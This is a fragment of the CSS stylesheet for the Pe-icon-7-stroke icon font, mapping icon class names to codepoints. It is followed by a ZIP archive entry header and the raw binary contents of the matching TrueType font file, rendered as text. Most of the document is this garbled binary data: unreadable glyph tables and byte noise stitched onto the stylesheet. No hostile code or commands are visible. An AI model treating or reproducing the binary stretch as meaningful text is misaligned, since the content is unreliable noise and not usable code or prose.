	content: "\e61e";
}
.pe-7s-note2:before {
	content: "\e69d";
}
.pe-7s-print:before {
	content: "\e61f";
}
.pe-7s-network:before {
	content: "\e69e";
}
.pe-7s-prev:before {
	content: "\e620";
}
.pe-7s-mute:before {
	content: "\e69f";
}
.pe-7s-power:before {
	content: "\e621";
}
.pe-7s-medal:before {
	content: "\e6a0";
}
.pe-7s-portfolio:before {
	content: "\e622";
}
.pe-7s-like2:before {
	content: "\e6a1";
}
.pe-7s-plus:before {
	content: "\e623";
}
.pe-7s-left-arrow:before {
	content: "\e6a2";
}
.pe-7s-play:before {
	content: "\e624";
}
.pe-7s-key:before {
	content: "\e6a3";
}
.pe-7s-plane:before {
	content: "\e625";
}
.pe-7s-joy:before {
	content: "\e6a4";
}
.pe-7s-photo-gallery:before {
	content: "\e626";
}
.pe-7s-pin:before {
	content: "\e69b";
}
.pe-7s-phone:before {
	content: "\e627";
}
.pe-7s-plug:before {
	content: "\e69a";
}
.pe-7s-pen:before {
	content: "\e628";
}
.pe-7s-right-arrow:before {
	content: "\e699";
}
.pe-7s-paper-plane:before {
	content: "\e629";
}
.pe-7s-delete-user:before {
	content: "\e6a7";
}
.pe-7s-paint:before {
	content: "\e62a";
}
.pe-7s-bottom-arrow:before {
	content: "\e6a8";
}
.pe-7s-notebook:before {
	content: "\e62b";
}
.pe-7s-note:before {
	content: "\e62c";
}
.pe-7s-next:before {
	content: "\e62d";
}
.pe-7s-news-paper:before {
	content: "\e62e";
}
.pe-7s-musiclist:before {
	content: "\e62f";
}
.pe-7s-music:before {
	content: "\e630";
}
.pe-7s-mouse:before {
	content: "\e631";
}
.pe-7s-more:before {
	content: "\e632";
}
.pe-7s-moon:before {
	content: "\e633";
}
.pe-7s-monitor:before {
	content: "\e634";
}
.pe-7s-micro:before {
	content: "\e635";
}
.pe-7s-menu:before {
	content: "\e636";
}
.pe-7s-map:before {
	content: "\e637";
}
.pe-7s-map-marker:before {
	content: "\e638";
}
.pe-7s-mail:before {
	content: "\e639";
}
.pe-7s-mail-open:before {
	content: "\e63a";
}
.pe-7s-mail-open-file:before {
	content: "\e63b";
}
.pe-7s-magnet:before {
	content: "\e63c";
}
.pe-7s-loop:before {
	content: "\e63d";
}
.pe-7s-look:before {
	content: "\e63e";
}
.pe-7s-lock:before {
	content: "\e63f";
}
.pe-7s-lintern:before {
	content: "\e640";
}
.pe-7s-link:before {
	content: "\e641";
}
.pe-7s-like:before {
	content: "\e642";
}
.pe-7s-light:before {
	content: "\e643";
}
.pe-7s-less:before {
	content: "\e644";
}
.pe-7s-keypad:before {
	content: "\e645";
}
.pe-7s-junk:before {
	content: "\e646";
}
.pe-7s-info:before {
	content: "\e647";
}
.pe-7s-home:before {
	content: "\e648";
}
.pe-7s-help2:before {
	content: "\e649";
}
.pe-7s-help1:before {
	content: "\e64a";
}
.pe-7s-graph3:before {
	content: "\e64b";
}
.pe-7s-graph2:before {
	content: "\e64c";
}
.pe-7s-graph1:before {
	content: "\e64d";
}
.pe-7s-graph:before {
	content: "\e64e";
}
.pe-7s-global:before {
	content: "\e64f";
}
.pe-7s-gleam:before {
	content: "\e650";
}
.pe-7s-glasses:before {
	content: "\e651";
}
.pe-7s-gift:before {
	content: "\e652";
}
.pe-7s-folder:before {
	content: "\e653";
}
.pe-7s-flag:before {
	content: "\e654";
}
.pe-7s-filter:before {
	content: "\e655";
}
.pe-7s-file:before {
	content: "\e656";
}
.pe-7s-expand1:before {
	content: "\e657";
}
.pe-7s-exapnd2:before {
	content: "\e658";
}
.pe-7s-edit:before {
	content: "\e659";
}
.pe-7s-drop:before {
	content: "\e65a";
}
.pe-7s-drawer:before {
	content: "\e65b";
}
.pe-7s-download:before {
	content: "\e65c";
}
.pe-7s-display2:before {
	content: "\e65d";
}
.pe-7s-display1:before {
	content: "\e65e";
}
.pe-7s-diskette:before {
	content: "\e65f";
}
.pe-7s-date:before {
	content: "\e660";
}
.pe-7s-cup:before {
	content: "\e661";
}
.pe-7s-culture:before {
	content: "\e662";
}
.pe-7s-crop:before {
	content: "\e663";
}
.pe-7s-credit:before {
	content: "\e664";
}
.pe-7s-copy-file:before {
	content: "\e665";
}
.pe-7s-config:before {
	content: "\e666";
}
.pe-7s-compass:before {
	content: "\e667";
}
.pe-7s-comment:before {
	content: "\e668";
}
.pe-7s-coffee:before {
	content: "\e669";
}
.pe-7s-cloud:before {
	content: "\e66a";
}
.pe-7s-clock:before {
	content: "\e66b";
}
.pe-7s-check:before {
	content: "\e66c";
}
.pe-7s-chat:before {
	content: "\e66d";
}
.pe-7s-cart:before {
	content: "\e66e";
}
.pe-7s-camera:before {
	content: "\e66f";
}
.pe-7s-call:before {
	content: "\e670";
}
.pe-7s-calculator:before {
	content: "\e671";
}
.pe-7s-browser:before {
	content: "\e672";
}
.pe-7s-box2:before {
	content: "\e673";
}
.pe-7s-box1:before {
	content: "\e674";
}
.pe-7s-bookmarks:before {
	content: "\e675";
}
.pe-7s-bicycle:before {
	content: "\e676";
}
.pe-7s-bell:before {
	content: "\e677";
}
.pe-7s-battery:before {
	content: "\e678";
}
.pe-7s-ball:before {
	content: "\e679";
}
.pe-7s-back:before {
	content: "\e67a";
}
.pe-7s-attention:before {
	content: "\e67b";
}
.pe-7s-anchor:before {
	content: "\e67c";
}
.pe-7s-albums:before {
	content: "\e67d";
}
.pe-7s-alarm:before {
	content: "\e67e";
}
.pe-7s-airplay:before {
	content: "\e67f";
}
PK!87}p�p�<it_sanctum/fonts/pe-icon-7-stroke/fonts/Pe-icon-7-stroke.ttfnu&1i��0OS/2"��`cmapU� LgasphglyfƳ>�p��headE	��d6hhea��ݜ$hmtx}~�8loca��b��maxp��� namevͫ���post�P �LfGLf��@������  8
 ����� ���������7979793��,1Jc#54&'.#!"3!2654&#%!2!5467>3!!'3267>54&'.#"3#"&'.5467>32�8�������b��xx				D



W/��+E//��"�ޑ						+��'@35#7'#537'"3267>54&'.#"&'.5467>32#�F::FR"<<,N!!N,,N!!N,)GG))GG)V:�:v!4�!N,,N!!N,,N!�gG))GG))G+��)D_�35#7'#5377>7>54&'.'>7>54&'.''>7>54&'.'"&'.5467>327.'.#"3267>7'#�F::FR"<<�		

))Y)GG)&
"*,N!!N,*"
&V:�:v!4`
  

""
�

						



�G))G
!N,,N!
mS2Kd"#>7>54&'.#"3!267>54&'.#467>32#"&'.5"&'.5467>32#�*
�
*****��

$#

#$

|#

#$



$S*



*****s$

$$

$b
$$

$$
O�q"3:54&'.#!"3!267>=35##!"&=463!27#'573�n	��			p*,���usOBJ		�		KC����F1E�3��z�"3267>54&'.#2.'.'.5467>7>76&'0&14676&'.'.'#0#.'.5467>3>7>7>54&'.'4&'.'&476456&'&67>7>73#"&'.'*K  K**K  K*'D






D'�
	


		
%$
� K**K  K**K D'!



	!'D��			

U����%7'735#!#3!KWWB4o4o����WWB���"��E��U��#(%#5467>32354&'.#"#!5#!5!w�
##
((<V4#��4�f"



"""((f��������_�5#7467>323467>323267>5##"&=1467>323467>323>54&'.'".'.#".'.#".'.#">7>32.'.#	3Z"!'	


		
	'!"Z3�

	

	



(  T//T  (�)"#[3�		�
3[#")�
		

		

		
	.Q""Q.	^��$/>CGK#54&'.+"#3;267>535'46;2#51+"&51533#'�UVU
�
�
V
x�
�
�x!��

��

D

��

C��!������������uz��%'7''73267>7>76&/?'.'.#"'7'7.#"733267>7>76&'773267>7>54&'7'#*'?#&47>7>7>327'.7>7>7>32?#"&/#"&/7�[$<H	

''		
IfC$CfH	
('				H=$Z�e++y
	6
�
8	�
	Z$ZDZ$=H



&(


HfC$CfI		


('		
I=$Z	R++��
8		�

6		�eZ$Z	
+��T7013267>54&'0&#'&"7*##35#"&'.5467>7'3267>54&'.#�

hP'DG))G
	!N,,N!!N,�
	Og�	]U F')GG)'"*,N!!N,,N!����
&3#5''73'3267>54&'.#"3#"&54632�q���YH��bPw3



���rY���Od^



3��1Jc��"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#74&'.#"73267>77'>7>5!467>32#"&'.5	



					

2222++++� K**K 

	#
#
  
#
"	

�wD''DD''D'		
		
		x	

	�2112�,,,,x*K  K*,#,
+		+
,",&EE&'DD'
���16;@EJOTY"3267>54&'.#"&'.5467>32#3#53#5'3#5!3#57'7'7'7'7..//((((�ff�ffGG��GGGG^GG`/../�((((ogg�fff��
GH��GGvHG
��GG��'35!57''7!57���#3"g����Ԁ���-xx����>eg��g���NN�<��(AT77'.'.'5#3267>54&'.'"&'.5467>32#75#35>54&'�*!&CG))G�%AA%%AA%	



T*"" E')GG)%��A%%AA%%A�pp

$$

��
'#7'7#'7/373666��6��6��'nn+c�**�n��f�hh�fltPP�G��O=�
2M3353#53#?'#5377>7>54&'.'>7>54&'.'3�}~�DD�bfgf�		
		
	


		7	wggeDhfUUYQ�SUe&'
 +* 
7



1��1Lg�%"3267>54&'.#"&'.5467>32#5">7>327.'.#5">7>327.'.#">7>327.'.#
		

		


(	
%%
	(#C2/?""?/2B$6'
$12$
'5�	
				
	x
		
�



�,*+
,D

&
#


#
%

*%��%#'#337'#37'737'#}8e�VO�l8MM��OVS
�e8MM8lS�7��8LMDWz7
ML8X3��	0!!!!%3267>=35#3#"&'.=35#33��f���x��((3
##
3��f��wx���));;"

";;��^w��".'.#"3267>73267>54&'.#"'>7>54&'73267>54&'.#2#"&'.5467>3'"&'.5467>32#%"&'.5467>32#�		�
		



	�

					��		



	U

�D�		
T

			]				
		\		T	
		��

D�

<��3Oj�"3267>54&'.#2#"&'.5467>3#"&'.=3267>75#"&'.=3267>75#"&'.=3267>7)GG))GG)(AA((AA(�A((A%77%A((A%77%A((A%77%�
#�#

##
��/D



//V/

/7��!:%'>7>54&'.#"3267>77%467>32#"&'.5�t	;!";;"


t�5445,t


";;"!;	t�5544G��c�����1Jl���%>7>'.'.#".'.#".'.#"3267>73267>73267>76&'.''2.'.'.'.'>7>3.'.'.'.'&454&5465<7>7>7>7>7.'.'>7>7.'.5'.'>77467>77>7>7.'.'<5<5'2.'.'>7>3>7>32.'.'&47"&'.'&67>7#"&'.'>7>7#7#"&'.'>7>7>7>7�			




				

^								

			P

E

W			>		U


�	
	
	(		
|


�	

� 
"
!
 
!
"
 t		�				



	
	BN	
<

�




^	�P




^		^��7!'!3#53#5^����3��"檪����fxx���kkg��D+
��
%!7'7'!5#%!7'!3���H\\Gx��hH\\G��qH\\G�VH\\G�3����)-%#"&'.5467>37'"3267>5#5�D''DD&��*J  K**K �oo�&EE&'DU^]U J+*K  K*@A�>�1m�%4654&'.#".#"3!267>54&'.##!"&'.5467>?>7>327>7>320132#'"&'.5467>37'"3267>5##�0%
			

%="

"��	
		
*

�

@@



�0

	
%
#"

�

			)


<	
	%%



	+��'8ER_ly����������"/HUn{0&1%&!"3!267>54&'.##!"&5463!2%"32654&#4&#"32657"32654&#"32654&#4&#"3265'"32654&#2654&#"3"32654&#3"32654&#'"32654&#2654&#"3"32654&#3"32654&#'2654&#"37"32654&#"32654&#"32654&#5"32654&#5"32654&#"3267>54&'.#"&54632#"3267>54&'.#"&54632#���#��		z	��z�^��kk^�����onn7�								NUD	��		�����@3go��3�3
		
"#



""��27<E"32654&#3"32654&#%#5##";35326=4&#%3#5#537#5##5!x



3



*^�^^�^�������gV�V�







DUU�DD�DDD�x��Dff��X�h%'7%'7��޼��3��޻���kkk�k��kkk�3��73#5#"&'.5467>753267>54&'.'�^'
D''D

%+ K**K -���""3&EE&2"&8*K  K* 9&3)��
%5##!#'3#53#5##53#5353353!<x���gVV��x��gVV�x���m**��D*�""�x33��""�+��1="3267>54&'.#"&'.5467>32###33535#,N!!N,,N!!N,)GG))GG)	vvww�!N,,N!!N,,N!�gG))GG))GDwvvf-��
'-x�4��u��*��������'I/?>?'77>7>323''?06?7'7>'&"#"'�e]T�-�O		
O'-VN'aZ_V'VU��e[d(UV,'O			P�,�OW�YU`��VU'We$��5!3!#!!#!!��o;�;��o��*���oWE��E3�4�E��x����',7<#";267>54&'.#+"&=35#3#546;23#5q�		�		�������44��b��KOO`��"������=jot''&"326?.#"01"1023267>7>76&'7'>7>753461425263>7>32'7'7�D����

 A��
	'&	Ve,e,�,�,��D����P		B��
'%	ee,e,E,�,�+��77'%'7�L�V�wF�G;і����E4�уw��/����KPm54&'.#!"#"372#35#54&'.+1#"&=46;3!267>=35##53#!"&'.=467>3!2�	��

�
"U"�	�33�	��			�		
;
;��;

;		�w��]		F		F3��-=#"3!#'53#3753!"5467>3"&'.5467>3!!�		
T�*.Xw?;���	D���
		��	
��'(��56�����

M<��..#"5!!#7>54&'!337#57>32�
	K��DLM���#�A���K��L
	��"�%��X�
�X�h7'577'5���������h��kk���kk�+��):?DINS#03:3:3267>541!"&=3+%#!>7>5!3#53#53#57#35#53�f
			U45c
��/U	b
��"��������������r

i�gzs
	"

	b��D�<怀o^^+��	-6O3#53#53#5%4&'.'*#"326764=7'5#"&5467>;1+������3w1ee#
�%5WLM� (

��		
#�
A		��


3����;Tm.'.#"3267>517.'.#"3267>5<51"&'.5467>32#%"&'.5467>32#��	

	
	�
	



	
��				�d�


	


X�



		
'�?		^				�����1;EU5467>7>=#3267>=4&'.'#5#467>7#5"&'.=3#	


+//+ff%�%fo(�(W	**	,..,|w&&w�'bb'�1Jc|�"3267>54&'.#"&'.5467>32#%"3267>54&'.#"&'.5467>32#'"3267>54&'.#"&'.5467>32#3



�



�UUUUU+��$J3267>7#"&'.5467>773267>7#"&'.5467>71� J*
%3)I
%/#<"O-&E'$'C�
*I 	&

 H*2%
&	(D%-O"=$
D&"
"��%!3#35#53!!�D�;�;�U��fq3��DD"��o����5]%267>=4&'.#"3467>32#"&'.=#"&'.=###35#5#>7>=##

#"



"M






�//2M�L2z
"�"



"�"




�

�UU..UU4UU4U3O�q	!5!!5!!5!7!!5!5!7!!53��f���x�w��fx����fx��qDD3""�DD3""�DD3""+��
!'1'77'7'77'q^fooffod�UUfUUgUUfUU�/38��8448f3��*@+��**A+��**@+��**A+��U����3Oi2'.'.5467>3267>54&'.#"35">7>54&'.#1"&'.5467>32#1 8��8 



#>	��	>#				�8 
	
��
	
 8�	
				
	�>$
	�	
$>�				+X�h !!#"/!57326?!%'7�g���f��oo
n//n��{ooh����oo��m//m
oo�+����#,1'.#"!'%762'.#"'71571762!%'7Ժ���r��{-.{	fopc
����{qq������{..z	�n�p{	����pq+����).5>CHMR'.#"#!'5'62#7'.#"'537'751571762!%'7%3#53#553#5Ժ)=U�BB�TJ3(-.'��:C	
po
����{qq�xxxxVV�(>U��B�B�-4�(..'�:�B	-pn��	����pqmf3D��#(G#"&'.=#3267>=##53!#53"&'.=33267>=3#VfD''DfUDD��DDg#>D
&&
D>#����&EE&�3333�x>#��%%��#>qO@w7"&'.5467>321#35#'#.'.#"3267>7'#%">7>32#"&'.'1'33267>54&'.#G���#

#		"<!	
((
	
"		
	#

#	98

((3���
##
	!<!((
�	
##

88((Fz1Jc|�"3267>7.'.#"&'.'>7>32#5"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32##@>"7E++J  56  J*&>299%B22B&%%%%







				z9$857��1!210�%%%%�



�



g				U��#(%54&'.#"#!5#'467>32#5!5!o((<V<�
##
����4�f((f��f"



"ff�������w�7F375#3#'553##'3"3267>=4&'.##"&=4632�;x;���;VVXV/�--



	�3g��fg3�"""^��'QM^	"		"	<""+��2m%"&'.'7326?>54&/.#"'7>32#"&'./.546?>32'.#"3267>?#

	k
		
		LLk�k

	k
		


HH�		

	l		
		
KKl	�	k	

	l		GG	+!��&N2'.'.5467>32>7>35".'.#"7>7>54&'.#1^%��%+��	
+�%
	��		
%				+
��
+U����/4A�4&'.#"1202135467>71>7>553#"&54632#8##5>7>54&'.#"#54&'.'041"4#04#.'.5467>32�>##>
		�		
�ff3



\*		*	8  8	-#>>#'
	xx
	
'��33"



j
"��"

# 88 #+��16"3267>54&'.#"&'.5467>32#'3#5,N!!N,,N!!N,)GG))GG)n���!N,,N!!N,,N!�gG))GG))G�<��1Jc|�����+D]v���7"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#267>54&'.#"352#"&'.5467>3"3267>54&'.#"&'.5467>32#o���UwU;	

	V

<UwU;	

	V

<UU	

	V

+O�q.9H%''77'7!3;267>?>7>5735+"&/!7#!"&='!?3334
33
4�V�S�	>1
��
p�3333333�"
��
"�
���

  +��#<U267>54&'.#"35#3#35#"3267>54&'.#"&'.5467>32#



3E,N!!N,,N!!N,)GG))GG).



#�;!N,,N!!N,,N!�gG))GG))G*��
#5#77'3535335'#5##57UE<��ֈ""xDx��"UfU���U"f<���D""D��ww̚��ww����
3��2M\x�����"3267>54&'.#"&'.5467>312#?'>7>54&'.'7.'.'7'.'.#1"'>7>32'>7>7.'.5467>77.'.'7381267>7#"&'.'7'>7>7*K  K**K  K*#

##

#fA@8@
+	
I+



+



�+
@
	CA@@	*	
I,+



�*	@
	� K**K  K**K ��
##

##
�+


+

:+
@
B@@@
+
I+

+


�+
?
	CAA	?
+	
+��1dq"3267>54&'.#"&'.5467>32#"3467>323467>7>7>54&'.#"32654&#,N!!N,,N!!N,)GG))GG)							





�!N,,N!!N,,N!�gG))GG))G4
				

		
�



+��%#####5##5#1!5�UUUU���w���ff���3��
!!''!5777!3��f�qMU32x��54UMm����f�J�=x":?��="v=�������r����""&#"'>54&'.#".#"3267>54&'.'732673267>54&'.'7:3267>54&'.#"&'.5467>32#7"&'.5467>32#"&'.5467>32#"&'.5467>32#�	P
Q		V			V
P		P		��



�



�



o



�	�C
	�			�C			
�		�3
		
�				w	

	"	

	+��(1FU%4&'.'1#13267>7178175>7>5'5"&'.5467>7#7'7� K**K !N,
 "�4"�)GD'p

uh�
�+L""L+,N!&2OC�*��G)'F Ǥ'�C-#
+��*9GUdx�������':81818#"32018181267>54&'.#267>7#5=#'"&'.'>7>7#467>73#>7>7.'.'3;".'.5.'.'>7>352=3.'.#73.'.'>7>554&'.'>7>7#7.'.''.'.'>7>7>7>7.'.'>7>7,M!!M,,N!!N,	LM	^]		]M	ML]^		^&


�	

^

	
�


�!N,,N!!N,,N!	M\
\\
mM	M

M	^\
\\
mM	M

�
	
6	


��
	

6	


f����
37#773#7,a�a��q�q��ճ�<���"�uKMf%#.'.#"'&".'.#"#";3267>5<573267>732654&#"&'.5467>32#!"&'.5467>32#�$"

"$$''$�� 

 !!!! 

 �"





""
'

'
"g        3��)26Ohqv{>7>54&'.#".'.#"#!##537'3'#772#"&'.5467>3467>32#"&'.573#533#553#i			



			d�dS�
*%��

<

�

H%*
�����ų�F
	

	
��D��H@"V

3

E@H��������31��$4?#54&'.+"3!267>=4&'.#%46;232!5!"&=!#��VV��
V
�
��g��
x
d	���
	


<��
��
f$��+[0#"&'.'.'.#"35>32326?5#"&'.'.'.#"5>323267>7�+$
					
%						
&.		
					

						
	
�
������"��
%#5'!'357!3f���UD���������˛k��
'#!1'#533!���*�qq�w�����f	yqq��x��3��#5#357'737355#35#7'#35#��zz�czz��z�cz�zzc���czzzzc���zc�znzz�3��	735#73#5%35#37%35!#33����3�l~}��x�������3�~~bͼ���<��4Pi��4&'.#"3>7>5"&'.5467>32##3267>54&'.'"&'.5467>32#75#35>7>54&'.'"&'.5467>32#�	

*				��
	
					�	



�		��#



�#��		D



恁��D



^����"C%4&5'113267>54&'.'"&'.5467>7041701#��x;"";�5}}5��"�	

!;;!

	�4
		��		
4+O�q*#!5'3##"&'.5#7!533267>73x�^�]��M�

�N4�xy





yqf��fU		U��
		
�U=��7'#73!35#!�WWB4o��o�VWWB����"��E	 ��$).38!33#!5#5335!!'#35#53;#553#53#5!!5!!5�4"��"��"3��f�ffDD4wwwwww������++3��"���ggVEEV+^3"��
7P%!377'53!!''777'"3267>54&'.#"&'.5467>32#�D�PQQP�U��f�3"5'0$7/]



u3��!----!"���GBk�dbGL�$	

	V

3��
#!!'#53!33533#53#53#5w���V"��g��V�
L�w������fDVxx��x��L��V44�33��	'\!!!5!!!3#5;#5#335#"735#37>32#"&'.=#3267>54&'.#3��f���x��x��o�m!d8F




��f�MM����^�_�(H



��2@P]0"+1!*1"5#35#5>7>57>54&'.#'.546320313#"&'.=!7532032�1��
K2D�D2K
��?	2//P?2	�
K3��3K
m?
\//ooR?\
��#(3'3#!5#%7!3#33#33#33#33#�D��>"�"������33D33D33D44E33���nn�������+��%7'!5##3!3535#!!���33"DD�����X
33��44������F�z!,7<AR!"3!267>54&'.#!!5#!"&=!%5463!2!3#553#5326=4&+"3�f		�		�^��V��f��V��V"��ff3"

"

z
�


E""�����3D	

	B��	
"'##!53'#533##55'#533#�W�hhW>>��V�>>VVE�VVjVE��E%>>>�iYV��R>>���V4V��+��Xq��73#'#5'.'./'7'.'./#537>7>?'77>7>?53267>54&'.#"3#'#3735>7>77'>7>735#.'.'7'.'.'51"&'.5467>32#1

$,-!$!	
4
	!$!-,$

4



+V!<!/1#<$
V
$<#1/!<!+



�)$	

4
	!$!//!$!	
4

	$)��



"- <!
V$<$33$<$V
!< -��



3����*C\aei>54&'.#"3267>54&'.''2#"&'.5467>3"&'.5467>32#'?77'7 		%? K**K ?% 



'DD''DD'f�B�AJ+R'8,R&�		$E&+J  J+&E$6
		
�DD''DD''DUB�A�w,'S ,&R3-��3@MZ!";53267>=4&'.#+'#"&=463!2'"32654&#3"32654&##"32654&#����C#
4+�

V
�



D



�



��
DD
��
,,
�

ހ











<����%).38%35!3267>753#5"&'.=!#!5!3#5;#5'3#5�D�x;" :33�5"5�D��U�E���";8 xgg�5oo5"�MMMMff>�;n20132+!"&'.5467>?>7>327>7>35".#"3!267>54&'.#4654&'.#1*

��	
		
%
			

%="

"0q)




			

	
%
#"

03��17"3267>54&'.#"&'.5467>32#5#35#*K  K**K  K*'DD''DD'fw� K**K  K**K �wD''DD''D��+��1H"3267>54&'.#"&'.5467>32#'&"326?64'&",N!!N,,N!!N,)GG))GG)k�09��!N,,N!!N,,N!�gG))GG))G�09�+��5!333535#5!###'#5!U�ր�D*����o�*7�5��DD�U�oU�77����6Ohm!'#33267>54&'33267>54&'.#1#'37#"&'.5467>323#"&'.5467>32/!#�PCS		x			��E��
		
�				�)J:�Fx��
		

			"��

		

		^��+>��+Haz��#'0"9.+"1#"3!267>=4&'.##!"&=46;77>;232'"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#�F)
U
(H

f


��

OU.N
�((((#

##

#







O)(���

�
.
��((((�
##

##
�



�



3����L�"&'.'.'.5467>?>32367>13>321#"3267>76&'.'.#"'"&'.'.'.7>7>?64'.'.#w0?*
		 
	
7
�	

(=+			4!	;(&@.	C

	)"%

�	+>%'9		
#
$)
Bf��	&7>ELSZaho35#73#57#";267>54&'.#+"&546;2'5#35#5#35#5#35#75#35#35#35#5#35#5#35#35#35#�������

�


�

�
�D"D"D3D3DwD"D3D>DD3""<��V��

V

���3DU3DV4E�3D3DU3DV4E��+��	!!!5!!!!!5#3#5;#5+��V��x��x��x^��E#��V�DD�x3��o����'7'''77��������	��������QT��SS;��JJ��+HHHH�JJ��3 ��
/@!3!35!!!5!3267>=4&'.+"3'46;2+"&=�fx"��V��x�||	|		|	�o��o���MM�%+��5FW#".+";201235154630213267>54&'.#46;2+"&5!+"&546;2��

�

�		�

��
�

�
�
�

�
�
��

	

"
��"

��



"

��SmKU^|��"'35##'35#01.'.#"3267>7326?3267>54&'.#'#.'.'7#7"&'.5467>32;#7'3"&'.5467>77'>32#�	* <�9$	#

#!
FN

##

#�>3@L

&O

�>�G�

$$


S"&?
#"


�4

"



"#
&{	6{6V

C		[{{[

	HG

3��0>%54&'.'54&+"!5'!575467>32267>5#3�,

,<�<+��</.<�	V	��0

0�00;1�..�1M		qOCQ;5#"#"&=46;%4&'.#54&'.+32+3267>=267>552#	��	���"
	����	
36�	�	���^#	�	#"D+��&@N\v�"3267>54&'.##>7>7'2#4&'.'>7>3#>7>73.'.'"&'.'>7>53#7.'.53,N!!N,,N!!N,ę#
�

	
4
	

`�
#d�#
�

	
4
	

`�

#�!N,,N!!N,,N!�+'#0�),,)'+0#�*'"0�),,)'*0"+>��#3.'.+'77524&'.'5�,E43����;4
YOaF;(Epp!��U0+P%&6V��!!3#5"32654&#����n�		��p�"��]�ww� ����>W%'7>7>54&'.#".'.'7'73267>77467>32#"&'.5�"L2	3
				

	3	.L"
$;! :$
��

XF+3		
	



	
		��*F220-*��	!!!!!!57!!5�4��V��g��x"D��h��U��3��g"+��*COZfrx"73267>77'>7>54&'.#"&'.5467>32##"3755467>;17#354&'.#1'132#35#'D,
+
$$
*,
D'#??##>>#M3
pf		"�3p
Df"		�^p�E'"
5446"'E��>#$>>$#>�
3pf"		p3
wf		"x�3-��!3!'37#%#'#5!�f�X4X���tt�0�33�x��ff����f<<����aA77'7'�
UTTTTU
TA
TTTTTT
U+��1=3267>54&'.#"#"&'.5467>32'77'7'iO))OO))O"H&&HH&&H�
UTTTTU
TwO))OO))O��H&&HH&&H�
TTTTTT
U��`'77'`TT0`
UT0*��19%267>54&'.#"32#"&'.5467>3'77',N""N,-M""M-(HH()GG)aUT0!N,,N""N,,N!�G)(HH()G�`
UT0��?@%7'73aTT1�`TT0*��1973267>54&'.#"!#"&'.5467>327'7*"M-,N""N,-M"�H()GG)(H�aTT1�,N!!N,,N""N,(HH()GG)aUT0��-@77'7'�`TT0�`TT0*��19%4&'.#"3267>5!467>32#"&'.577'7'�"N,-M""M-,N"�fG)(HH()G�`TT0�,N""N,,N!!N,)GG)(HH(`TT0��`77''�`TT0�aUT0*��19"3267>54&'.#"&'.5467>32#'7''-M""M-,N""N,)GG)(HH(
aUT1�"N,,N!!N,,N"�fH()GG)(H�aUT06�	y7'7'#57<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#�ML88�1$		
	
%oo

	
	
*

xx"

#�
LL7��7i1


%


			*


##
���	y%'75377<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#ALM88b0$
				

&oo

		
*



xx"



"JLL8��8�1


%


			*





"#

A�16<DLQV[`"3267>54&'.#"&'.5467>32#'!5!!5!!5#!5#!5#!5#3#53#5%3#53#5






���m���qI���J�����2222
22224

T

���8��(��"�������5'7'7577'57'wflqk�yu�^^bb�flqk�yu��^^��bb��a�"',37'#5##3#33535#5'5!!!'7!%3#53#5�u33u��v22v���$$����$$��TT�TT+<:""v;;��vT)+2T**u�	��	!&+�3#53#553#5'5##!##53'3#53#5!!7.'.'"&5467>5>76&'4"14676&'.'#0"#3581025>7>7>54&'.'5'0&'<14656&'467>73101213<54&'
uuuuSSC�������""�����m�	




e2�33��q""2TT2""����K
				
			
��%/:S#7'7'.#"723267>5<57'.'.'7/77"&'.5467>32#�50�wY4>^D4_w_KG�K0

6Y....3`50kwZ4>`E4`__L
G�sM15B.--.��q�1|73267>54&'.#"72#"&'.5467>37'#"&'.5467>77'"3>7>323.'.#5267>72:!!::!!:�4444_
(F
'* J)
#	




	#

�!::!!;;!�4444��.F(3$.
(8*K#��5Pk#935151511'#53717>7>54&'.'7>7>54&'.'7>7>54&'.'�{_`zdTTd8D



4					
	
	
	
�bLKaa�b�NNvP?v�	

	





= $$ "&(#7-32,.56/0���w73:3:130233:3:13023:3265<54&'.'.'"&5467>7>76&'<1&676&'.'.+"0.'.'&45467>7>76&'041&676&'.'.+"01#467>7>7>54&'./.'&6715061516&'&67>7>731!5'467>7>7>54&'.5/.'&4=3<1536&'467>7>739#5H
Z		
Z	


	
	
				

�
		
	

��

	


u�
			
		
		
						
			



	
	**
	
		��i�"3267>54&'.#>7>7>7>='"&#"&'>7>737>7>321#"#"&'.'7.5<1063267>7.'.51.'.#"#3210.'.5467>32�)J  J)*I  I*n
			
			
		�9		

9C&'C
�I**II**I��!



				





	

 !! 
	&&CC&&��1:%4&'.#"3267>5!467>32#"&'.5%7'735�!M+,L!!L,+M!�mF((FF((FffQ�+M!!M++M!!M+(FF((FF(
ffR��I�w1Z%4&'.#"3267>5"&'.5467>32##32+3267>54&'.#.7777�1111ɀe11e� 77 �7777�11111177G�w\g������7'.'>7>'.'.3267#.'.'.7>7>73#3534&15#.'.5#35#'7'>%.'&67>76&'&'.'&67>763#5;#5!3#5!3#5��j-



(D

N262E��3$��




33�22��33P22�OKB	

:
	

	



PgD



f

]��7<AFLQW"#33267>54&'.#"&'.'35#>7>32#5#3=#37!!#531!!!!1�









::


���
������\��~�,				

�

3C�2Cv����?�~���`����1:7267>54&'.#"32#"&'.5467>37'#3�+M!!M+,L!!L,(FF((FF(
ffQ��!M++M!!M++M!�F((FF((F��ffR��JZd%1"1#"&'.5&6777>?7'7''7''326?>327.#"'7#"&'.5467'7-�
 !

/0HG0GG/0''�!"
�0v/

��



 
0/GG0GH0/&&�

�/v0v
��.Y3:377'7'..'.'645./?117>76.7>?'1.'./#"#"&'&	z��z#",�`Y3�	

,";	,"#z��z	&�aM*�3(���>7>312#"&'./1'.'.5467>7>7>32'.#"3267>7>54&/.'.#"'.'.5467>7"
		
�
cv	��

�	
				�			���

�dv��
	�		�	
		��



����	 >S73#53#53#5.'.#"#!#5467>32#>7>?!33.'.'53e���Ɇ��	
		���S
�	���
�	
��CC.		�L�&���
		
�n��"'%5#535#3##35#53#35#'3#5#533#53GuK�LuL�L�L�L�����놆�*��*����ۇ���������''5#9373717717537#31'515�r{`?kvc~��Ud{>�Vs�r]bLKkvd�uP?zNCZ`l��.�'AZs�>7>=#3267>54&'.''53353.'.#".5"&'.5467>32#5"3267>54&'.#"&'.5467>32#�
�
77 �ST



\1111$$%

%




